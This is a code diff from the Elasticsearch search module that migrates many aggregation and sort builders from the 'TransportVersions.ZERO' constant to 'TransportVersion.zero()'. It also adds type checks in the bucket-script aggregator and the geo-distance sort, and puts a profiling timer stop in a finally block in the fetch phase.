a/server/src/main/java/org/elasticsearch/search/aggregations/metrics/CardinalityAggregationBuilder.java b/server/src/main/java/org/elasticsearch/search/aggregations/metrics/CardinalityAggregationBuilder.java index 560eb61c7d7a6..fbe276a0422d9 100644 --- a/server/src/main/java/org/elasticsearch/search/aggregations/metrics/CardinalityAggregationBuilder.java +++ b/server/src/main/java/org/elasticsearch/search/aggregations/metrics/CardinalityAggregationBuilder.java @@ -203,6 +203,6 @@ public String getType() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + 
return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/search/aggregations/metrics/ExtendedStatsAggregationBuilder.java b/server/src/main/java/org/elasticsearch/search/aggregations/metrics/ExtendedStatsAggregationBuilder.java index af47141730e60..709eef132d2ce 100644 --- a/server/src/main/java/org/elasticsearch/search/aggregations/metrics/ExtendedStatsAggregationBuilder.java +++ b/server/src/main/java/org/elasticsearch/search/aggregations/metrics/ExtendedStatsAggregationBuilder.java @@ -10,7 +10,6 @@ package org.elasticsearch.search.aggregations.metrics; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.search.aggregations.AggregationBuilder; @@ -149,6 +148,6 @@ public String getType() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/search/aggregations/metrics/GeoBoundsAggregationBuilder.java b/server/src/main/java/org/elasticsearch/search/aggregations/metrics/GeoBoundsAggregationBuilder.java index 244f0b0f632f8..e1c668bbe605f 100644 --- a/server/src/main/java/org/elasticsearch/search/aggregations/metrics/GeoBoundsAggregationBuilder.java +++ b/server/src/main/java/org/elasticsearch/search/aggregations/metrics/GeoBoundsAggregationBuilder.java @@ -10,7 +10,6 @@ package org.elasticsearch.search.aggregations.metrics; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.search.aggregations.AggregationBuilder; @@ -147,6 +146,6 @@ public String getType() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/search/aggregations/metrics/GeoCentroidAggregationBuilder.java b/server/src/main/java/org/elasticsearch/search/aggregations/metrics/GeoCentroidAggregationBuilder.java index 8cd5cd22a30dc..644f825c67195 100644 --- a/server/src/main/java/org/elasticsearch/search/aggregations/metrics/GeoCentroidAggregationBuilder.java +++ b/server/src/main/java/org/elasticsearch/search/aggregations/metrics/GeoCentroidAggregationBuilder.java @@ -10,7 +10,6 @@ package org.elasticsearch.search.aggregations.metrics; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.search.aggregations.AggregationBuilder; @@ -109,6 +108,6 @@ public String getType() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/search/aggregations/metrics/MaxAggregationBuilder.java b/server/src/main/java/org/elasticsearch/search/aggregations/metrics/MaxAggregationBuilder.java index d40110d77c398..8e8b8f5b8b380 100644 --- a/server/src/main/java/org/elasticsearch/search/aggregations/metrics/MaxAggregationBuilder.java +++ b/server/src/main/java/org/elasticsearch/search/aggregations/metrics/MaxAggregationBuilder.java @@ -10,7 +10,6 @@ package org.elasticsearch.search.aggregations.metrics; import 
org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.search.aggregations.AggregationBuilder; @@ -106,6 +105,6 @@ public String getType() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/search/aggregations/metrics/MedianAbsoluteDeviationAggregationBuilder.java b/server/src/main/java/org/elasticsearch/search/aggregations/metrics/MedianAbsoluteDeviationAggregationBuilder.java index ae38fd6e3d26a..b439a34d0857b 100644 --- a/server/src/main/java/org/elasticsearch/search/aggregations/metrics/MedianAbsoluteDeviationAggregationBuilder.java +++ b/server/src/main/java/org/elasticsearch/search/aggregations/metrics/MedianAbsoluteDeviationAggregationBuilder.java @@ -183,6 +183,6 @@ public String getType() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/search/aggregations/metrics/MinAggregationBuilder.java b/server/src/main/java/org/elasticsearch/search/aggregations/metrics/MinAggregationBuilder.java index 5120a10d71822..e24e88cfbfb35 100644 --- a/server/src/main/java/org/elasticsearch/search/aggregations/metrics/MinAggregationBuilder.java +++ b/server/src/main/java/org/elasticsearch/search/aggregations/metrics/MinAggregationBuilder.java @@ -10,7 +10,6 @@ package org.elasticsearch.search.aggregations.metrics; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.search.aggregations.AggregationBuilder; @@ -108,6 +107,6 @@ public String getType() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/search/aggregations/metrics/PercentileRanksAggregationBuilder.java b/server/src/main/java/org/elasticsearch/search/aggregations/metrics/PercentileRanksAggregationBuilder.java index a6619f64943e9..1c68aa3a558be 100644 --- a/server/src/main/java/org/elasticsearch/search/aggregations/metrics/PercentileRanksAggregationBuilder.java +++ b/server/src/main/java/org/elasticsearch/search/aggregations/metrics/PercentileRanksAggregationBuilder.java @@ -10,7 +10,6 @@ package org.elasticsearch.search.aggregations.metrics; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.search.aggregations.AggregationBuilder; import org.elasticsearch.search.aggregations.AggregatorFactories; @@ -113,6 +112,6 @@ public String getType() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/search/aggregations/metrics/PercentilesAggregationBuilder.java b/server/src/main/java/org/elasticsearch/search/aggregations/metrics/PercentilesAggregationBuilder.java index b9975730bdab5..55e21518821d1 100644 --- a/server/src/main/java/org/elasticsearch/search/aggregations/metrics/PercentilesAggregationBuilder.java +++ 
b/server/src/main/java/org/elasticsearch/search/aggregations/metrics/PercentilesAggregationBuilder.java @@ -10,7 +10,6 @@ package org.elasticsearch.search.aggregations.metrics; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.search.aggregations.AggregationBuilder; import org.elasticsearch.search.aggregations.AggregatorFactories; @@ -149,6 +148,6 @@ public String getType() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/search/aggregations/metrics/ScriptedMetricAggregationBuilder.java b/server/src/main/java/org/elasticsearch/search/aggregations/metrics/ScriptedMetricAggregationBuilder.java index f18b7663232e0..41d2fb6fb12c1 100644 --- a/server/src/main/java/org/elasticsearch/search/aggregations/metrics/ScriptedMetricAggregationBuilder.java +++ b/server/src/main/java/org/elasticsearch/search/aggregations/metrics/ScriptedMetricAggregationBuilder.java @@ -10,7 +10,6 @@ package org.elasticsearch.search.aggregations.metrics; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.common.settings.ClusterSettings; @@ -291,7 +290,7 @@ public String getType() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } @Override diff --git a/server/src/main/java/org/elasticsearch/search/aggregations/metrics/StatsAggregationBuilder.java b/server/src/main/java/org/elasticsearch/search/aggregations/metrics/StatsAggregationBuilder.java index a1ad81177f47a..6c35fa909bee4 100644 --- a/server/src/main/java/org/elasticsearch/search/aggregations/metrics/StatsAggregationBuilder.java +++ b/server/src/main/java/org/elasticsearch/search/aggregations/metrics/StatsAggregationBuilder.java @@ -10,7 +10,6 @@ package org.elasticsearch.search.aggregations.metrics; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.search.aggregations.AggregationBuilder; @@ -113,7 +112,7 @@ public String getType() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } @Override diff --git a/server/src/main/java/org/elasticsearch/search/aggregations/metrics/SumAggregationBuilder.java b/server/src/main/java/org/elasticsearch/search/aggregations/metrics/SumAggregationBuilder.java index 7f6c40d78d89c..0e7145ff7b501 100644 --- a/server/src/main/java/org/elasticsearch/search/aggregations/metrics/SumAggregationBuilder.java +++ b/server/src/main/java/org/elasticsearch/search/aggregations/metrics/SumAggregationBuilder.java @@ -10,7 +10,6 @@ package org.elasticsearch.search.aggregations.metrics; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.search.aggregations.AggregationBuilder; @@ -106,6 +105,6 @@ public String getType() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + 
return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/search/aggregations/metrics/TopHitsAggregationBuilder.java b/server/src/main/java/org/elasticsearch/search/aggregations/metrics/TopHitsAggregationBuilder.java index 2ec30b411928a..5263737f3b411 100644 --- a/server/src/main/java/org/elasticsearch/search/aggregations/metrics/TopHitsAggregationBuilder.java +++ b/server/src/main/java/org/elasticsearch/search/aggregations/metrics/TopHitsAggregationBuilder.java @@ -10,7 +10,6 @@ package org.elasticsearch.search.aggregations.metrics; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.ParsingException; import org.elasticsearch.common.Strings; import org.elasticsearch.common.io.stream.StreamInput; @@ -820,6 +819,6 @@ public String getType() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/search/aggregations/metrics/ValueCountAggregationBuilder.java b/server/src/main/java/org/elasticsearch/search/aggregations/metrics/ValueCountAggregationBuilder.java index f62c0e1cc612c..5596f8a9fa3a2 100644 --- a/server/src/main/java/org/elasticsearch/search/aggregations/metrics/ValueCountAggregationBuilder.java +++ b/server/src/main/java/org/elasticsearch/search/aggregations/metrics/ValueCountAggregationBuilder.java @@ -10,7 +10,6 @@ package org.elasticsearch.search.aggregations.metrics; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.search.aggregations.AggregationBuilder; @@ -115,6 +114,6 @@ public String getType() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/search/aggregations/metrics/WeightedAvgAggregationBuilder.java b/server/src/main/java/org/elasticsearch/search/aggregations/metrics/WeightedAvgAggregationBuilder.java index 6b7790c61e73c..62abedc9f9873 100644 --- a/server/src/main/java/org/elasticsearch/search/aggregations/metrics/WeightedAvgAggregationBuilder.java +++ b/server/src/main/java/org/elasticsearch/search/aggregations/metrics/WeightedAvgAggregationBuilder.java @@ -10,7 +10,6 @@ package org.elasticsearch.search.aggregations.metrics; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.index.query.QueryBuilder; @@ -132,6 +131,6 @@ public String getType() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/search/aggregations/pipeline/AvgBucketPipelineAggregationBuilder.java b/server/src/main/java/org/elasticsearch/search/aggregations/pipeline/AvgBucketPipelineAggregationBuilder.java index d1b304ff5c1e6..72e7b3a051e13 100644 --- a/server/src/main/java/org/elasticsearch/search/aggregations/pipeline/AvgBucketPipelineAggregationBuilder.java +++ b/server/src/main/java/org/elasticsearch/search/aggregations/pipeline/AvgBucketPipelineAggregationBuilder.java @@ -10,7 +10,6 @@ package org.elasticsearch.search.aggregations.pipeline; import 
org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.xcontent.XContentBuilder;
@@ -65,6 +64,6 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } }
diff --git a/server/src/main/java/org/elasticsearch/search/aggregations/pipeline/BucketScriptPipelineAggregationBuilder.java b/server/src/main/java/org/elasticsearch/search/aggregations/pipeline/BucketScriptPipelineAggregationBuilder.java index f141d2223d34a..9d6e004d7be4b 100644 --- a/server/src/main/java/org/elasticsearch/search/aggregations/pipeline/BucketScriptPipelineAggregationBuilder.java +++ b/server/src/main/java/org/elasticsearch/search/aggregations/pipeline/BucketScriptPipelineAggregationBuilder.java
@@ -10,7 +10,6 @@ package org.elasticsearch.search.aggregations.pipeline; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.common.util.Maps;
@@ -212,6 +211,6 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } }
diff --git a/server/src/main/java/org/elasticsearch/search/aggregations/pipeline/BucketScriptPipelineAggregator.java b/server/src/main/java/org/elasticsearch/search/aggregations/pipeline/BucketScriptPipelineAggregator.java index 224a39bb73d05..05943591cc026 100644 --- a/server/src/main/java/org/elasticsearch/search/aggregations/pipeline/BucketScriptPipelineAggregator.java +++ b/server/src/main/java/org/elasticsearch/search/aggregations/pipeline/BucketScriptPipelineAggregator.java
@@ -21,6 +21,7 @@ import java.util.ArrayList; import java.util.HashMap; import java.util.List; +import java.util.Locale; import java.util.Map; import static org.elasticsearch.search.aggregations.pipeline.BucketHelpers.resolveBucketValue;
@@ -47,10 +48,24 @@ public class BucketScriptPipelineAggregator extends PipelineAggregator { } @Override + @SuppressWarnings({ "rawtypes", "unchecked" }) public InternalAggregation reduce(InternalAggregation aggregation, AggregationReduceContext reduceContext) { - @SuppressWarnings({ "rawtypes", "unchecked" }) - InternalMultiBucketAggregation originalAgg = - (InternalMultiBucketAggregation) aggregation; + + InternalMultiBucketAggregation originalAgg; + + if (aggregation instanceof InternalMultiBucketAggregation multiBucketAggregation) { + originalAgg = multiBucketAggregation; + } else { + throw new IllegalArgumentException( + String.format( + Locale.ROOT, + "Expected a multi bucket aggregation but got [%s] for aggregation [%s]", + aggregation.getClass().getSimpleName(), + name() + ) + ); + } + List<? extends InternalMultiBucketAggregation.InternalBucket> buckets = originalAgg.getBuckets(); BucketAggregationScript.Factory factory = reduceContext.scriptService().compile(script, BucketAggregationScript.CONTEXT);
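
Illustrative sketch (not part of the patch): the BucketScriptPipelineAggregator change above replaces an unchecked cast with a pattern-matching instanceof plus a descriptive failure message. The same guard shape, reduced to self-contained placeholder types (Shape and Circle are hypothetical, not Elasticsearch classes):

import java.util.Locale;

class InstanceofGuardSketch {
    interface Shape {}

    record Circle(double radius) implements Shape {}

    static Circle requireCircle(Shape shape, String name) {
        if (shape instanceof Circle circle) {
            return circle; // safe: the pattern variable is already typed
        }
        // fail with the offending runtime type and the caller-supplied name
        throw new IllegalArgumentException(
            String.format(Locale.ROOT, "Expected a circle but got [%s] for [%s]", shape.getClass().getSimpleName(), name)
        );
    }
}
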
diff --git a/server/src/main/java/org/elasticsearch/search/aggregations/pipeline/CumulativeSumPipelineAggregationBuilder.java b/server/src/main/java/org/elasticsearch/search/aggregations/pipeline/CumulativeSumPipelineAggregationBuilder.java index 75431ac44d200..28ba864458e7a 100644 --- a/server/src/main/java/org/elasticsearch/search/aggregations/pipeline/CumulativeSumPipelineAggregationBuilder.java +++ b/server/src/main/java/org/elasticsearch/search/aggregations/pipeline/CumulativeSumPipelineAggregationBuilder.java
@@ -10,7 +10,6 @@ package org.elasticsearch.search.aggregations.pipeline; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.search.DocValueFormat;
@@ -124,6 +123,6 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } }
diff --git a/server/src/main/java/org/elasticsearch/search/aggregations/pipeline/ExtendedStatsBucketPipelineAggregationBuilder.java b/server/src/main/java/org/elasticsearch/search/aggregations/pipeline/ExtendedStatsBucketPipelineAggregationBuilder.java index 52570c1466302..dba6a4b8133e6 100644 --- a/server/src/main/java/org/elasticsearch/search/aggregations/pipeline/ExtendedStatsBucketPipelineAggregationBuilder.java +++ b/server/src/main/java/org/elasticsearch/search/aggregations/pipeline/ExtendedStatsBucketPipelineAggregationBuilder.java
@@ -10,7 +10,6 @@ package org.elasticsearch.search.aggregations.pipeline; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.xcontent.XContentBuilder;
@@ -102,6 +101,6 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } }
diff --git a/server/src/main/java/org/elasticsearch/search/aggregations/pipeline/MaxBucketPipelineAggregationBuilder.java b/server/src/main/java/org/elasticsearch/search/aggregations/pipeline/MaxBucketPipelineAggregationBuilder.java index 1d1a51d5ddb58..f0cbec99f23cd 100644 --- a/server/src/main/java/org/elasticsearch/search/aggregations/pipeline/MaxBucketPipelineAggregationBuilder.java +++ b/server/src/main/java/org/elasticsearch/search/aggregations/pipeline/MaxBucketPipelineAggregationBuilder.java
@@ -10,7 +10,6 @@ package org.elasticsearch.search.aggregations.pipeline; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.xcontent.XContentBuilder;
@@ -65,6 +64,6 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } }
diff --git a/server/src/main/java/org/elasticsearch/search/aggregations/pipeline/MinBucketPipelineAggregationBuilder.java b/server/src/main/java/org/elasticsearch/search/aggregations/pipeline/MinBucketPipelineAggregationBuilder.java index 57daa8e9c0de5..f5d4d8f7e84dc 100644 --- a/server/src/main/java/org/elasticsearch/search/aggregations/pipeline/MinBucketPipelineAggregationBuilder.java +++ b/server/src/main/java/org/elasticsearch/search/aggregations/pipeline/MinBucketPipelineAggregationBuilder.java
@@ -10,7 +10,6 @@ package org.elasticsearch.search.aggregations.pipeline; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.xcontent.XContentBuilder;
@@ -65,6 +64,6 @@
public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/search/aggregations/pipeline/PercentilesBucketPipelineAggregationBuilder.java b/server/src/main/java/org/elasticsearch/search/aggregations/pipeline/PercentilesBucketPipelineAggregationBuilder.java index d77178e234b53..9704896e20752 100644 --- a/server/src/main/java/org/elasticsearch/search/aggregations/pipeline/PercentilesBucketPipelineAggregationBuilder.java +++ b/server/src/main/java/org/elasticsearch/search/aggregations/pipeline/PercentilesBucketPipelineAggregationBuilder.java @@ -10,7 +10,6 @@ package org.elasticsearch.search.aggregations.pipeline; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.xcontent.ParseField; @@ -114,7 +113,7 @@ protected XContentBuilder doXContentBody(XContentBuilder builder, Params params) @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } public static final PipelineAggregator.Parser PARSER = new BucketMetricsParser() { diff --git a/server/src/main/java/org/elasticsearch/search/aggregations/pipeline/SerialDiffPipelineAggregationBuilder.java b/server/src/main/java/org/elasticsearch/search/aggregations/pipeline/SerialDiffPipelineAggregationBuilder.java index 03b4867f6036b..efa4e0f943635 100644 --- a/server/src/main/java/org/elasticsearch/search/aggregations/pipeline/SerialDiffPipelineAggregationBuilder.java +++ b/server/src/main/java/org/elasticsearch/search/aggregations/pipeline/SerialDiffPipelineAggregationBuilder.java @@ -10,7 +10,6 @@ package org.elasticsearch.search.aggregations.pipeline; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.ParsingException; import org.elasticsearch.common.Strings; import org.elasticsearch.common.io.stream.StreamInput; @@ -231,6 +230,6 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/search/aggregations/pipeline/StatsBucketPipelineAggregationBuilder.java b/server/src/main/java/org/elasticsearch/search/aggregations/pipeline/StatsBucketPipelineAggregationBuilder.java index 4383366f5a670..bbf1dacb3c31f 100644 --- a/server/src/main/java/org/elasticsearch/search/aggregations/pipeline/StatsBucketPipelineAggregationBuilder.java +++ b/server/src/main/java/org/elasticsearch/search/aggregations/pipeline/StatsBucketPipelineAggregationBuilder.java @@ -10,7 +10,6 @@ package org.elasticsearch.search.aggregations.pipeline; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.xcontent.XContentBuilder; @@ -65,6 +64,6 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/search/aggregations/pipeline/SumBucketPipelineAggregationBuilder.java 
b/server/src/main/java/org/elasticsearch/search/aggregations/pipeline/SumBucketPipelineAggregationBuilder.java index f97ded8d5e64f..9bc2e7f0cd4c3 100644 --- a/server/src/main/java/org/elasticsearch/search/aggregations/pipeline/SumBucketPipelineAggregationBuilder.java +++ b/server/src/main/java/org/elasticsearch/search/aggregations/pipeline/SumBucketPipelineAggregationBuilder.java
@@ -10,7 +10,6 @@ package org.elasticsearch.search.aggregations.pipeline; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.xcontent.XContentBuilder;
@@ -65,6 +64,6 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } }
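
Illustrative sketch (not part of the patch): every builder touched above makes the same one-line migration, from the TransportVersions.ZERO constant to the TransportVersion.zero() accessor. A minimal, hypothetical writeable showing the override shape; ExampleBuilder stands in for the real classes:

import org.elasticsearch.TransportVersion;

// A writeable that has been wire-compatible since the beginning reports the
// zero() sentinel as its minimal supported transport version.
abstract class ExampleBuilder {
    public String getType() {
        return "example";
    }

    public TransportVersion getMinimalSupportedVersion() {
        return TransportVersion.zero(); // previously: TransportVersions.ZERO
    }
}
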
diff --git a/server/src/main/java/org/elasticsearch/search/fetch/FetchPhase.java b/server/src/main/java/org/elasticsearch/search/fetch/FetchPhase.java index 0dd9cc3622fae..bd0f6ee8f66d3 100644 --- a/server/src/main/java/org/elasticsearch/search/fetch/FetchPhase.java +++ b/server/src/main/java/org/elasticsearch/search/fetch/FetchPhase.java
@@ -161,17 +161,21 @@ private SearchHits buildSearchHits(SearchContext context, int[] docIdsToLoad, Pr @Override protected void setNextReader(LeafReaderContext ctx, int[] docsInLeaf) throws IOException { Timer timer = profiler.startNextReader(); - this.ctx = ctx; - this.leafNestedDocuments = nestedDocuments.getLeafNestedDocuments(ctx); - this.leafStoredFieldLoader = storedFieldLoader.getLoader(ctx, docsInLeaf); - this.leafSourceLoader = sourceLoader.leaf(ctx.reader(), docsInLeaf); - this.leafIdLoader = idLoader.leaf(leafStoredFieldLoader, ctx.reader(), docsInLeaf); - fieldLookupProvider.setNextReader(ctx); - for (FetchSubPhaseProcessor processor : processors) { - processor.setNextReader(ctx); - } - if (timer != null) { - timer.stop(); + try { + this.ctx = ctx; + this.leafNestedDocuments = nestedDocuments.getLeafNestedDocuments(ctx); + this.leafStoredFieldLoader = storedFieldLoader.getLoader(ctx, docsInLeaf); + this.leafSourceLoader = sourceLoader.leaf(ctx.reader(), docsInLeaf); + this.leafIdLoader = idLoader.leaf(leafStoredFieldLoader, ctx.reader(), docsInLeaf); + + fieldLookupProvider.setNextReader(ctx); + for (FetchSubPhaseProcessor processor : processors) { + processor.setNextReader(ctx); + } + } finally { + if (timer != null) { + timer.stop(); + } } }
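
Illustrative sketch (not part of the patch): the FetchPhase hunk above moves the per-segment setup into try/finally so the profiling timer is stopped even when a loader throws. The same shape with a stand-in Timer type:

// Timer here is a minimal stand-in for the profiler's timer, not the real class.
final class TimerGuardSketch {
    interface Timer {
        void stop();
    }

    static void setNextReader(Timer timer, Runnable setupThatMayThrow) {
        try {
            setupThatMayThrow.run(); // leaf loaders and sub-phase processors
        } finally {
            if (timer != null) { // null when profiling is disabled
                timer.stop();
            }
        }
    }
}
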
fieldName + "] for geo distance based sort"); } } - return context.getForField(fieldType, MappedFieldType.FielddataOperation.SEARCH); + IndexFieldData indexFieldData = context.getForField(fieldType, MappedFieldType.FielddataOperation.SEARCH); + if (indexFieldData instanceof IndexGeoPointFieldData) { + return (IndexGeoPointFieldData) indexFieldData; + } + throw new IllegalArgumentException( + "unable to apply geo distance sort to field [" + fieldName + "] of type [" + fieldType.typeName() + "]" + ); } private Nested nested(SearchExecutionContext context) throws IOException { diff --git a/server/src/main/java/org/elasticsearch/search/sort/ScoreSortBuilder.java b/server/src/main/java/org/elasticsearch/search/sort/ScoreSortBuilder.java index 0977b38585052..e572a451c6d89 100644 --- a/server/src/main/java/org/elasticsearch/search/sort/ScoreSortBuilder.java +++ b/server/src/main/java/org/elasticsearch/search/sort/ScoreSortBuilder.java @@ -13,7 +13,6 @@ import org.apache.lucene.search.Scorable; import org.apache.lucene.search.SortField; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.common.util.BigArrays; @@ -165,7 +164,7 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } @Override diff --git a/server/src/main/java/org/elasticsearch/search/sort/ScriptSortBuilder.java b/server/src/main/java/org/elasticsearch/search/sort/ScriptSortBuilder.java index bd353d0af6c2c..106b483790fe3 100644 --- a/server/src/main/java/org/elasticsearch/search/sort/ScriptSortBuilder.java +++ b/server/src/main/java/org/elasticsearch/search/sort/ScriptSortBuilder.java @@ -452,7 +452,7 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } public enum ScriptSortType implements Writeable { diff --git a/server/src/main/java/org/elasticsearch/search/suggest/completion/CompletionSuggestionBuilder.java b/server/src/main/java/org/elasticsearch/search/suggest/completion/CompletionSuggestionBuilder.java index 19c84f08281b0..efa32f2be2efe 100644 --- a/server/src/main/java/org/elasticsearch/search/suggest/completion/CompletionSuggestionBuilder.java +++ b/server/src/main/java/org/elasticsearch/search/suggest/completion/CompletionSuggestionBuilder.java @@ -10,7 +10,6 @@ import org.elasticsearch.ElasticsearchParseException; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.bytes.BytesReference; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; @@ -323,7 +322,7 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } @Override diff --git a/server/src/main/java/org/elasticsearch/search/suggest/phrase/Laplace.java b/server/src/main/java/org/elasticsearch/search/suggest/phrase/Laplace.java index fb4e25c22772a..c57996adeb342 100644 --- a/server/src/main/java/org/elasticsearch/search/suggest/phrase/Laplace.java +++ b/server/src/main/java/org/elasticsearch/search/suggest/phrase/Laplace.java @@ -13,7 +13,6 @@ import org.apache.lucene.index.Terms; import org.apache.lucene.util.BytesRef; import 
